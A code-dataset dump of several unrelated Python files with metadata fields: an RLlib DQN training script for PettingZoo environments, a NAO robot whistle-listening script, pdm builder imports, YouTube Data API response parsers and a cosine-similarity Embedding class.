        # restore='/home/jiekaijia/PycharmProjects/pettingzoo_comunication/ray_results/DQN/DQN_simple_spread_91f8e_00000_0_2021-06-07_14-33-32/checkpoint_000008/checkpoint-8',
        num_samples=1
    )
    # Get the tuple of checkpoint_path and metric
    checkpoints = results.get_trial_checkpoints_paths(
        trial=results.get_best_trial("episode_reward_mean", mode="max"),
        metric="episode_reward_mean"
    )
    ray.shutdown()
|
""""""
from copy import deepcopy
import os
from pettingzoo.mpe import (
simple_crypto_v2,
simple_reference_v2,
simple_speaker_listener_v3,
simple_spread_v2,
simple_tag_v2,
simple_world_comm_v2,
)
import ray
from ray.rllib.agents.registry import get_trainer_class
from ray import tune
from ray.tune.registry import register_env
from utils import parallel_env, parallel_comm_env, main_comm_env, main_env
if __name__ == '__main__':
# Create test environment.
test_env = main_env(simple_speaker_listener_v3)()
# Register env
register_env('simple_spread', lambda _: main_env(simple_speaker_listener_v3)())
# The used algorithm
alg_name = 'DQN'
# Gets default training configuration.
config = deepcopy(get_trainer_class(alg_name)._default_config)
# === Settings for Rollout Worker processes ===
# Use GPUs if `RLLIB_NUM_GPUS` env var set to > 0.
config['num_gpus'] = int(os.environ.get('RLLIB_NUM_GPUS', '0'))
# Number of rollout worker actors to create for parallel sampling.
config['num_workers'] = 1
config['num_envs_per_worker'] = 4
config['render_env'] = True
# === Settings for the Trainer process ===
# Whether layers should be shared for the value function.
config['model'] = {
# 'fcnet_hiddens': [128],
'fcnet_activation': 'relu',
}
# === Environment Settings ===
config['env'] = 'simple_spread'
# the env_creator function via the register env lambda below.
# config['env_config'] = {'max_cycles': max_cycles, 'num_agents': num_agents, 'local_ratio': local_ratio}
# # === Debug Settings ===
# # Periodically print out summaries of relevant internal dataflow(DEBUG, INFO, WARN, or ERROR.)
config['log_level'] = 'DEBUG'
# === Settings for Multi-Agent Environments ===
# Configuration for multi-agent setup with policy sharing:
config['multiagent'] = {
# Map of type MultiAgentPolicyConfigDict from policy ids to tuples
# of (policy_cls, obs_space, act_space, config). This defines the
# observation and action spaces of the policies and any extra config.
'policies': {
f'{agent}': (None, test_env.observation_spaces[agent], test_env.action_spaces[agent], {}) for agent in test_env.agents
},
# Function mapping agent ids to policy ids.
'policy_mapping_fn': lambda agent_id: f'{agent_id}',
}
# Initialize ray and trainer object
ray.init(
ignore_reinit_error=True,
# log_to_driver=False
)
# Stop criteria
stop = {
# "episode_reward_mean": -115,
"training_iteration": 700,
}
# Train
results = tune.run(
alg_name,
stop=stop,
config=config,
checkpoint_at_end=True,
checkpoint_freq=1,
local_dir='./ray_results',
# restore='/home/jiekaijia/PycharmProjects/pettingzoo_comunication/ray_results/DQN/DQN_simple_spread_91f8e_00000_0_2021-06-07_14-33-32/checkpoint_000008/checkpoint-8',
num_samples=1
)
# Get the tuple of checkpoint_path and metric
checkpoints = results.get_trial_checkpoints_paths(
trial=results.get_best_trial("episode_reward_mean", mode="max"),
metric="episode_reward_mean"
)
ray.shutdown()
|
en
| 0.651787
|
# Create test environment. # Register env # The used algorithm # Gets default training configuration. # === Settings for Rollout Worker processes === # Use GPUs if `RLLIB_NUM_GPUS` env var set to > 0. # Number of rollout worker actors to create for parallel sampling. # === Settings for the Trainer process === # Whether layers should be shared for the value function. # 'fcnet_hiddens': [128], # === Environment Settings === # the env_creator function via the register env lambda below. # config['env_config'] = {'max_cycles': max_cycles, 'num_agents': num_agents, 'local_ratio': local_ratio} # # === Debug Settings === # # Periodically print out summaries of relevant internal dataflow(DEBUG, INFO, WARN, or ERROR.) # === Settings for Multi-Agent Environments === # Configuration for multi-agent setup with policy sharing: # Map of type MultiAgentPolicyConfigDict from policy ids to tuples # of (policy_cls, obs_space, act_space, config). This defines the # observation and action spaces of the policies and any extra config. # Function mapping agent ids to policy ids. # Initialize ray and trainer object # log_to_driver=False # Stop criteria # "episode_reward_mean": -115, # Train # restore='/home/jiekaijia/PycharmProjects/pettingzoo_comunication/ray_results/DQN/DQN_simple_spread_91f8e_00000_0_2021-06-07_14-33-32/checkpoint_000008/checkpoint-8', # Get the tuple of checkpoint_path and metric
| 1.933626
| 2
|
FirstShot/Listen.py
|
PengZhang0/Bipedal-robot-relay-racing-motion-system-based-on-OpenCV-and-NAOqi-OS
| 0
|
6628095
|
# coding=utf-8
import Walk
import time
import NewWalk
import Utils
import numpy as np
from threading import Lock, Thread, Event
from Config import CommonConfig, ListenConfig, WalkConfig
import wave
# if CommonConfig.IS_DEBUG_MODEL:
# from matplotlib import pyplot as plt
# flag = 1 # 信号指示灯,如果某一时刻的响度大于这个阈值,flag会变成0,代表机器人可以开跑了
# lock = Lock() # 锁对象,用于同步
# event = Event()
def function():
    # Block until a loud sound (the starting whistle) is detected:
    # repeatedly record a short clip through the NAO microphones, measure
    # its peak loudness, and return once the peak exceeds the configured
    # threshold.  (Python 2 code -- print statements.)
    while True:
        print 'start recording...'
        try:
            Utils.record.startMicrophonesRecording(
                ListenConfig.RECORD_PATH,  # path where the recording is saved
                ListenConfig.RECORD_TYPE,  # recording file format
                ListenConfig.RECORD_FREQUENCY,  # sampling frequency
                ListenConfig.RECORD_PASSAGEWAY  # recording channel
            )
        except BaseException as e:
            # A previous recording may still be in progress: stop it and retry.
            print e
            Utils.record.stopMicrophonesRecording()
            Utils.record.startMicrophonesRecording(
                ListenConfig.RECORD_PATH,  # path where the recording is saved
                ListenConfig.RECORD_TYPE,  # recording file format
                ListenConfig.RECORD_FREQUENCY,  # sampling frequency
                ListenConfig.RECORD_PASSAGEWAY  # recording channel
            )
        time.sleep(ListenConfig.RECORD_DELAY)  # wait while the clip records
        Utils.record.stopMicrophonesRecording()  # stop recording
        if CommonConfig.IS_DEBUG_MODEL:
            Utils.get_file(ListenConfig.RECORD_PATH, ListenConfig.LOCAL_PATH)  # download the file from the NAO robot to the local machine
        else:
            pass  # when running on the NAO robot itself there is nothing to do
        print 'record over'
        #######################################################################
        print 'get loudness begin...'
        try:
            if CommonConfig.IS_DEBUG_MODEL:
                f = wave.open(ListenConfig.LOCAL_PATH, "rb")  # debug mode: open the local copy
            else:
                f = wave.open(ListenConfig.RECORD_PATH, "rb")  # on-robot mode: open the file on the NAO robot
            frames = f.getnframes()  # number of frames
            str_data = f.readframes(frames)  # read all frames
            f.close()
            wave_data = np.fromstring(str_data, dtype=np.int16)  # waveform sample list
            max_score = wave_data.max()  # peak loudness
            print '最大响度为', max_score
            # if CommonConfig.IS_DEBUG_MODEL:  # in debug mode, plot the waveform
            #     x = range(1, wave_data.__len__() + 1)
            #     plt.plot(x, wave_data)
            #     plt.show()
            if max_score > ListenConfig.LOUDNESS_THRESHOLD:  # is the peak above the threshold?
                break
        except BaseException as e:
            print e
    print 'get loudness over'
def run(): # entry point: wait for the whistle, then start the race
    Walk.rest()
    Utils.say('in monitor...')
    function() # block until the whistle is heard
    # Utils.say('Go...') # things to do once the whistle is heard
    # start_time = time.time()
    # Walk.move(WalkConfig.INIT_RUN_COUNT, 0, 0, WalkConfig.g_moveConfig6) # initial adjustment
    # time.sleep(1)
    Walk.run() # start running!
    Utils.send_massage()  # NOTE(review): name looks like a typo for 'send_message' — matches Utils as-is, confirm before renaming
    # end_time = time.time()
    # cost_time = end_time - start_time
    # print 'total time from whistle to finish: {} seconds'.format(cost_time)
|
# coding=utf-8
import Walk
import time
import NewWalk
import Utils
import numpy as np
from threading import Lock, Thread, Event
from Config import CommonConfig, ListenConfig, WalkConfig
import wave
# if CommonConfig.IS_DEBUG_MODEL:
# from matplotlib import pyplot as plt
# flag = 1 # 信号指示灯,如果某一时刻的响度大于这个阈值,flag会变成0,代表机器人可以开跑了
# lock = Lock() # 锁对象,用于同步
# event = Event()
def function():
while True:
print 'start recording...'
try:
Utils.record.startMicrophonesRecording(
ListenConfig.RECORD_PATH, # 录音文件保存地址
ListenConfig.RECORD_TYPE, # 录音保存格式
ListenConfig.RECORD_FREQUENCY, # 录音频率
ListenConfig.RECORD_PASSAGEWAY # 录音通道
)
except BaseException as e:
print e
Utils.record.stopMicrophonesRecording()
Utils.record.startMicrophonesRecording(
ListenConfig.RECORD_PATH, # 录音文件保存地址
ListenConfig.RECORD_TYPE, # 录音保存格式
ListenConfig.RECORD_FREQUENCY, # 录音频率
ListenConfig.RECORD_PASSAGEWAY # 录音通道
)
time.sleep(ListenConfig.RECORD_DELAY) # 延迟,录音
Utils.record.stopMicrophonesRecording() # 结束录音
if CommonConfig.IS_DEBUG_MODEL:
Utils.get_file(ListenConfig.RECORD_PATH, ListenConfig.LOCAL_PATH) # NAO机器人上传文件到本地
else:
pass # 如果在NAO机器人上运行的话就什么也不做
print 'record over'
#######################################################################
print 'get loudness begin...'
try:
if CommonConfig.IS_DEBUG_MODEL:
f = wave.open(ListenConfig.LOCAL_PATH, "rb") # Debug模式,在本地找文件
else:
f = wave.open(ListenConfig.RECORD_PATH, "rb") # 非Debug模式,在NAO机器人上找文件
frames = f.getnframes() # 读取帧数
str_data = f.readframes(frames) # 读取全部帧
f.close()
wave_data = np.fromstring(str_data, dtype=np.int16) # 获取正弦波列表
max_score = wave_data.max() # 最大响度
print '最大响度为', max_score
# if CommonConfig.IS_DEBUG_MODEL: # 如果是Debug模式,则会显示声波图
# x = range(1, wave_data.__len__() + 1)
# plt.plot(x, wave_data)
# plt.show()
if max_score > ListenConfig.LOUDNESS_THRESHOLD: # 判断当前最大响度是否大于阈值
break
except BaseException as e:
print e
print 'get loudness over'
def run(): # 运行函数
Walk.rest()
Utils.say('in monitor...')
function() # 监听哨声
# Utils.say('Go...') # 听到哨声要做的事
# start_time = time.time()
# Walk.move(WalkConfig.INIT_RUN_COUNT, 0, 0, WalkConfig.g_moveConfig6) # 初始化调整
# time.sleep(1)
Walk.run() # 开跑!
Utils.send_massage()
# end_time = time.time()
# cost_time = end_time - start_time
# print '从听到哨声到跑完共花费时间:{}秒'.format(cost_time)
|
zh
| 0.59256
|
# coding=utf-8 # if CommonConfig.IS_DEBUG_MODEL: # from matplotlib import pyplot as plt # flag = 1 # 信号指示灯,如果某一时刻的响度大于这个阈值,flag会变成0,代表机器人可以开跑了 # lock = Lock() # 锁对象,用于同步 # event = Event() # 录音文件保存地址 # 录音保存格式 # 录音频率 # 录音通道 # 录音文件保存地址 # 录音保存格式 # 录音频率 # 录音通道 # 延迟,录音 # 结束录音 # NAO机器人上传文件到本地 # 如果在NAO机器人上运行的话就什么也不做 ####################################################################### # Debug模式,在本地找文件 # 非Debug模式,在NAO机器人上找文件 # 读取帧数 # 读取全部帧 # 获取正弦波列表 # 最大响度 # if CommonConfig.IS_DEBUG_MODEL: # 如果是Debug模式,则会显示声波图 # x = range(1, wave_data.__len__() + 1) # plt.plot(x, wave_data) # plt.show() # 判断当前最大响度是否大于阈值 # 运行函数 # 监听哨声 # Utils.say('Go...') # 听到哨声要做的事 # start_time = time.time() # Walk.move(WalkConfig.INIT_RUN_COUNT, 0, 0, WalkConfig.g_moveConfig6) # 初始化调整 # time.sleep(1) # 开跑! # end_time = time.time() # cost_time = end_time - start_time # print '从听到哨声到跑完共花费时间:{}秒'.format(cost_time)
| 2.173033
| 2
|
pdm/builders/__init__.py
|
shidenggui/pdm
| 1
|
6628096
|
<filename>pdm/builders/__init__.py
from pdm.builders.editable import EditableBuilder # noqa
from pdm.builders.sdist import SdistBuilder # noqa
from pdm.builders.wheel import WheelBuilder # noqa
|
<filename>pdm/builders/__init__.py
from pdm.builders.editable import EditableBuilder # noqa
from pdm.builders.sdist import SdistBuilder # noqa
from pdm.builders.wheel import WheelBuilder # noqa
|
uz
| 0.446344
|
# noqa # noqa # noqa
| 1.237811
| 1
|
youtube_api/parsers.py
|
M4rkoHR/youtube-data-api
| 0
|
6628097
|
<gh_stars>0
import json
import sys
import datetime
from collections import OrderedDict
if sys.version_info[0] == 2:
from collections import Iterable
else:
from collections.abc import Iterable
from youtube_api.youtube_api_utils import parse_yt_datetime
"""
This script contains the parsers for the raw json responses
from the API. Use `raw_json` to return the output as-is.
"""
__all__ = ['raw_json',
'parse_video_metadata',
'parse_channel_metadata',
'parse_rec_video_metadata',
'parse_video_url',
'parse_subscription_descriptive',
'parse_featured_channels',
'parse_comment_metadata',
'parse_playlist_metadata',
'parse_caption_track']
def raw_json(item):
    '''
    Identity parser: hand the API response back exactly as received.
    '''
    return item
def raw_json_with_datetime(item):
    '''
    Return the raw json output from the API, stamped with today's date
    under the 'collection_date' key (mutates and returns ``item``).
    '''
    today = datetime.datetime.now().strftime('%Y-%m-%d')
    item['collection_date'] = today
    return item
def parse_video_metadata(item):
    '''
    Flatten one video resource into video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_view_count, video_comment_count, video_like_count, video_dislike_count, duration, video_thumbnail, video_tags and collection_date.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    snippet = item["snippet"]
    statistics = item["statistics"]
    tags = snippet.get('tags')
    # A missing 'tags' entry yields None, which is not Iterable.
    video_tags = '|'.join(tags) if isinstance(tags, Iterable) else ''
    return {
        "video_id" : item['id'],
        "channel_title" : snippet.get("channelTitle"),
        "channel_id" : snippet.get("channelId"),
        "video_publish_date" : parse_yt_datetime(snippet.get("publishedAt")),
        "video_title" : snippet.get("title"),
        "video_description" : snippet.get("description"),
        "video_category" : snippet.get("categoryId"),
        "video_view_count" : statistics.get("viewCount"),
        "video_comment_count" : statistics.get("commentCount"),
        "video_like_count" : statistics.get("likeCount"),
        "video_dislike_count" : statistics.get("dislikeCount"),
        "duration" : item["contentDetails"]["duration"],
        "video_thumbnail" : snippet["thumbnails"]["high"]["url"],
        "video_tags" : video_tags,
        "collection_date" : datetime.datetime.now()
    }
def parse_video_url(item):
    '''
    Extract publish_date, video_id, channel_id and collection_date from a
    playlist-item resource.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    snippet = item['snippet']
    return {
        "video_id" : snippet['resourceId'].get('videoId'),
        "channel_id" : snippet.get('channelId'),
        "publish_date" : parse_yt_datetime(snippet.get('publishedAt')),
        "collection_date" : datetime.datetime.now()
    }
def parse_channel_metadata(item):
    '''
    Flatten one channel resource into channel_id, title, account_creation_date, keywords, description, view_count, video_count, subscription_count, playlist_id_likes, playlist_id_uploads, topic_ids, country and collection_date.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    snippet = item['snippet']
    statistics = item["statistics"]
    playlists = item['contentDetails']['relatedPlaylists']
    topic = item.get('topicDetails')
    # When present, collapse the topic categories into one pipe-joined string.
    if topic:
        topic = '|'.join(topic.get('topicCategories'))
    return {
        "channel_id" : item['id'],
        "title" : snippet.get("title"),
        "account_creation_date" : parse_yt_datetime(snippet.get("publishedAt")),
        "keywords" : item['brandingSettings']['channel'].get('keywords'),
        "description" : snippet.get("description"),
        "view_count" : statistics.get("viewCount"),
        "video_count" : statistics.get("videoCount"),
        "subscription_count" : statistics.get("subscriberCount"),
        "playlist_id_likes" : playlists.get('likes'),
        "playlist_id_uploads" : playlists.get('uploads'),
        "topic_ids" : topic,
        "country" : snippet.get('country'),
        "collection_date" : datetime.datetime.now()
    }
def parse_subscription_descriptive(item):
    '''
    Flatten one subscription resource into subscription_title, subscription_channel_id, subscription_kind, subscription_publish_date and collection_date.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    snippet = item['snippet']
    resource = snippet['resourceId']
    return {
        "subscription_title" : snippet['title'],
        "subscription_channel_id" : resource.get('channelId'),
        "subscription_kind" : resource.get('kind'),
        "subscription_publish_date" : parse_yt_datetime(snippet.get('publishedAt')),
        "collection_date" : datetime.datetime.now()
    }
def parse_featured_channels(item):
    '''
    Map the channel id to its list of featured-channel URLs (empty list when
    the channel features none).
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    featured = item['brandingSettings']['channel'].get('featuredChannelsUrls', [])
    return {item['id']: featured}
def parse_playlist_metadata(item):
    '''
    Flatten one playlist resource into playlist_name, playlist_id, playlist_publish_date, playlist_n_videos, channel_id, channel_name and collection_date.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    snippet = item['snippet']
    return {
        "playlist_name" : snippet.get('title'),
        "playlist_id" : item['id'],
        "playlist_publish_date" : parse_yt_datetime(snippet.get('publishedAt')),
        "playlist_n_videos" : item['contentDetails'].get('itemCount'),
        "channel_id" : snippet.get('channelId'),
        "channel_name" : snippet.get('channelTitle'),
        "collection_date" : datetime.datetime.now()
    }
def parse_comment_metadata(item):
    '''
    Parses and processes raw output and returns video_id, commenter_channel_url, commenter_channel_display_name, comment_id, comment_like_count, comment_publish_date, text, commenter_rating, comment_parent_id, reply_count, collection_date.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    # Top-level comments nest the actual comment under 'topLevelComment';
    # keep a handle on the outer snippet because only it carries
    # 'totalReplyCount'.  (The original left `save` unbound for replies and
    # papered over the NameError with a bare except.)
    save = None
    if item['snippet'].get('topLevelComment'):
        save = item['snippet']
        item = item['snippet']['topLevelComment']
    # 'authorChannelId' can be absent (e.g. deleted accounts); the original
    # chained .get() raised AttributeError on None in that case.
    author_channel = item['snippet'].get('authorChannelId') or {}
    comment_meta = {
        "video_id" : item["snippet"].get("videoId"),
        "commenter_channel_url" : item["snippet"].get("authorChannelUrl"),
        "commenter_channel_id" : author_channel.get('value'),
        "commenter_channel_display_name" : item['snippet'].get('authorDisplayName'),
        "comment_id" : item.get("id"),
        "comment_like_count" : item["snippet"].get("likeCount"),
        "comment_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
        "text" : item["snippet"].get("textDisplay"),
        "commenter_rating" : item["snippet"].get("viewerRating"),
        "comment_parent_id" : item["snippet"].get("parentId"),
        "collection_date" : datetime.datetime.now()
    }
    # Replies have no wrapping snippet; fall back to the comment itself.
    if save is not None:
        comment_meta['reply_count'] = save.get('totalReplyCount')
    else:
        comment_meta['reply_count'] = item.get('totalReplyCount')
    return comment_meta
def parse_rec_video_metadata(item):
    '''
    Flatten one recommended-video search result into video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_thumbnail and collection_date.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    snippet = item["snippet"]
    return {
        "video_id" : item['id'].get('videoId'),
        "channel_title" : snippet.get("channelTitle"),
        "channel_id" : snippet.get("channelId"),
        "video_publish_date" : parse_yt_datetime(snippet.get("publishedAt")),
        "video_title" : snippet.get("title"),
        "video_description" : snippet.get("description"),
        "video_category" : snippet.get("categoryId"),
        "video_thumbnail" : snippet["thumbnails"]["high"]["url"],
        "collection_date" : datetime.datetime.now()
    }
def parse_caption_track(item):
    '''
    Return just the video_id, caption and collection_date fields of ``item``.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    # TODO: convert known errors into an error message.
    return {key: item[key] for key in ("video_id", "caption", "collection_date")}
|
import json
import sys
import datetime
from collections import OrderedDict
if sys.version_info[0] == 2:
from collections import Iterable
else:
from collections.abc import Iterable
from youtube_api.youtube_api_utils import parse_yt_datetime
"""
This script contains the parsers for the raw json responses
from the API. Use `raw_json` to return the output as-is.
"""
__all__ = ['raw_json',
'parse_video_metadata',
'parse_channel_metadata',
'parse_rec_video_metadata',
'parse_video_url',
'parse_subscription_descriptive',
'parse_featured_channels',
'parse_comment_metadata',
'parse_playlist_metadata',
'parse_caption_track']
def raw_json(item):
'''
Returns the raw json output from the API.
'''
return item
def raw_json_with_datetime(item):
'''
Returns the raw json output from the API.
'''
item['collection_date'] = datetime.datetime.now().strftime('%Y-%m-%d')
return item
def parse_video_metadata(item):
'''
Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_view_count, video_comment_count, video_like_count, video_dislike_count, video_thumbnail, video_tags, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
tags = item["snippet"].get('tags')
if isinstance(tags, Iterable):
video_tags = '|'.join(tags)
else:
video_tags = ''
video_meta = {
"video_id" : item['id'],
"channel_title" : item["snippet"].get("channelTitle"),
"channel_id" : item["snippet"].get("channelId"),
"video_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"video_title" : item["snippet"].get("title"),
"video_description" : item["snippet"].get("description"),
"video_category" : item["snippet"].get("categoryId"),
"video_view_count" : item["statistics"].get("viewCount"),
"video_comment_count" : item["statistics"].get("commentCount"),
"video_like_count" : item["statistics"].get("likeCount"),
"video_dislike_count" : item["statistics"].get("dislikeCount"),
"duration" : item["contentDetails"]["duration"],
"video_thumbnail" : item["snippet"]["thumbnails"]["high"]["url"],
"video_tags" : video_tags,
"collection_date" : datetime.datetime.now()
}
return video_meta
def parse_video_url(item):
'''
Parses and processes raw output and returns publish_date, video_id, channel_id, collection_date
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
publish_date = item['snippet'].get('publishedAt')
publish_date = parse_yt_datetime(publish_date)
video_id = item['snippet']['resourceId'].get('videoId')
channel_id = item['snippet'].get('channelId')
return {
"video_id" : video_id,
"channel_id" : channel_id,
"publish_date" : publish_date,
"collection_date" : datetime.datetime.now()
}
def parse_channel_metadata(item):
'''
Parses and processes raw output and returns channel_id, title, account_creatation_date, keywords, description, view_count, video_count, subscription_count, playlist_id_likes, playlist_id_uploads, topic_ids, country, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
topic = item.get('topicDetails')
if topic:
topic = '|'.join(topic.get('topicCategories'))
channel_meta = {
"channel_id" : item['id'],
"title" : item["snippet"].get("title"),
"account_creation_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"keywords" : item['brandingSettings']['channel'].get('keywords'),
"description" : item["snippet"].get("description"),
"view_count" : item["statistics"].get("viewCount"),
"video_count" : item["statistics"].get("videoCount"),
"subscription_count" : item["statistics"].get("subscriberCount"),
"playlist_id_likes" : item['contentDetails']['relatedPlaylists'].get('likes'),
"playlist_id_uploads" : item['contentDetails']['relatedPlaylists'].get('uploads'),
"topic_ids" : topic,
"country" : item['snippet'].get('country'),
"collection_date" : datetime.datetime.now()
}
return channel_meta
def parse_subscription_descriptive(item):
'''
Parses and processes raw output and returns subscription_title, subscription_channel_id, subscription_kind, subscription_publish_date, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
sub_meta = {
"subscription_title" : item['snippet']['title'],
"subscription_channel_id" : item['snippet']['resourceId'].get('channelId'),
"subscription_kind" : item['snippet']['resourceId'].get('kind'),
"subscription_publish_date" : parse_yt_datetime(item['snippet'].get('publishedAt')),
"collection_date" : datetime.datetime.now()
}
return sub_meta
def parse_featured_channels(item):
'''
Parses and processes raw output and returns a dictionary where the key is the channel_id and the key is a list of channel URLs.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
d = {}
d[item['id']] = item['brandingSettings']['channel'].get('featuredChannelsUrls', [])
return d
def parse_playlist_metadata(item):
'''
Parses and processes raw output and returns playlist_name, playlist_id, playlist_publish_date, playlist_n_videos, channel_id, channel_name, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
playlist_meta = {
"playlist_name" : item['snippet'].get('title'),
"playlist_id" : item['id'],
"playlist_publish_date" : parse_yt_datetime(item['snippet'].get('publishedAt')),
"playlist_n_videos" : item['contentDetails'].get('itemCount'),
"channel_id" : item['snippet'].get('channelId'),
"channel_name" : item['snippet'].get('channelTitle'),
"collection_date" : datetime.datetime.now()
}
return playlist_meta
def parse_comment_metadata(item):
    '''
    Parses and processes raw output and returns video_id, commenter_channel_url, commenter_channel_display_name, comment_id, comment_like_count, comment_publish_date, text, commenter_rating, comment_parent_id, reply_count, collection_date.
    :params item: json document
    :type item: dict
    :returns: parsed dictionary
    :rtype: dict
    '''
    if not isinstance(item, dict):
        return dict()
    # Top-level comments nest the actual comment under 'topLevelComment';
    # keep a handle on the outer snippet because only it carries
    # 'totalReplyCount'.  (The original left `save` unbound for replies and
    # papered over the NameError with a bare except.)
    save = None
    if item['snippet'].get('topLevelComment'):
        save = item['snippet']
        item = item['snippet']['topLevelComment']
    # 'authorChannelId' can be absent (e.g. deleted accounts); the original
    # chained .get() raised AttributeError on None in that case.
    author_channel = item['snippet'].get('authorChannelId') or {}
    comment_meta = {
        "video_id" : item["snippet"].get("videoId"),
        "commenter_channel_url" : item["snippet"].get("authorChannelUrl"),
        "commenter_channel_id" : author_channel.get('value'),
        "commenter_channel_display_name" : item['snippet'].get('authorDisplayName'),
        "comment_id" : item.get("id"),
        "comment_like_count" : item["snippet"].get("likeCount"),
        "comment_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
        "text" : item["snippet"].get("textDisplay"),
        "commenter_rating" : item["snippet"].get("viewerRating"),
        "comment_parent_id" : item["snippet"].get("parentId"),
        "collection_date" : datetime.datetime.now()
    }
    # Replies have no wrapping snippet; fall back to the comment itself.
    if save is not None:
        comment_meta['reply_count'] = save.get('totalReplyCount')
    else:
        comment_meta['reply_count'] = item.get('totalReplyCount')
    return comment_meta
def parse_rec_video_metadata(item):
'''
Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_thumbnail, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
video_meta = {
"video_id" : item['id'].get('videoId'),
"channel_title" : item["snippet"].get("channelTitle"),
"channel_id" : item["snippet"].get("channelId"),
"video_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"video_title" : item["snippet"].get("title"),
"video_description" : item["snippet"].get("description"),
"video_category" : item["snippet"].get("categoryId"),
"video_thumbnail" : item["snippet"]["thumbnails"]["high"]["url"],
"collection_date" : datetime.datetime.now()
}
return video_meta
def parse_caption_track(item):
'''
Returns the video_id, captions and collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
#TODO: convert known errors into an error message.
caption_meta = {
"video_id" : item['video_id'],
"caption" : item['caption'],
"collection_date" : item['collection_date']
}
return caption_meta
|
en
| 0.453442
|
This script contains the parsers for the raw json responses from the API. Use `raw_json` to return the output as-is. Returns the raw json output from the API. Returns the raw json output from the API. Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_view_count, video_comment_count, video_like_count, video_dislike_count, video_thumbnail, video_tags, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns publish_date, video_id, channel_id, collection_date :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns channel_id, title, account_creatation_date, keywords, description, view_count, video_count, subscription_count, playlist_id_likes, playlist_id_uploads, topic_ids, country, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns subscription_title, subscription_channel_id, subscription_kind, subscription_publish_date, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns a dictionary where the key is the channel_id and the key is a list of channel URLs. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns playlist_name, playlist_id, playlist_publish_date, playlist_n_videos, channel_id, channel_name, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns video_id, commenter_channel_url, commenter_channel_display_name, comment_id, comment_like_count, comment_publish_date, text, commenter_rating, comment_parent_id, collection_date. 
:params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_thumbnail, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Returns the video_id, captions and collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict #TODO: convert known errors into an error message.
| 3.189533
| 3
|
rec/online/datastructer/Embedding.py
|
nbsps/SilvensnRecSys
| 1
|
6628098
|
from math import sqrt
from typing import List
class Embedding:
    """A dense embedding vector with cosine-similarity support."""

    def __init__(self, embVector: List[float] = None):
        # Build a fresh list per instance: the original used `embVector=[]`,
        # a mutable default shared by every Embedding created without args.
        self.embVector: List[float] = [] if embVector is None else embVector

    def addElem(self, elem: float):
        # Bug fix: list.insert() requires an index argument and raised
        # TypeError here; append the element at the end instead.
        self.embVector.append(elem)

    def getEmbVector(self):
        return self.embVector

    def calculateSimilarity(self, anotherEmb) -> float:
        """Return the cosine similarity with ``anotherEmb``, or -1 when
        either vector is missing/empty, dimensions differ, or a vector has
        zero magnitude."""
        if anotherEmb is None:
            return -1
        other = anotherEmb.getEmbVector()
        # Bug fixes vs. the original guard: it returned -1 whenever the
        # OTHER vector was NON-empty (inverted truthiness test), called the
        # nonexistent anotherEmb.size(), and later indexed anotherEmb[i] on
        # a non-subscriptable object.
        if not self.embVector or not other or len(self.embVector) != len(other):
            return -1
        dotProduct = 0.0
        denominator1 = 0.0
        denominator2 = 0.0
        for a, b in zip(self.embVector, other):
            dotProduct += a * b
            denominator1 += a * a
            denominator2 += b * b
        denom = sqrt(denominator1 * denominator2)
        if denom == 0:
            # Zero-magnitude vector: similarity is undefined; keep the
            # class's -1 error convention instead of dividing by zero.
            return -1
        return dotProduct / denom
|
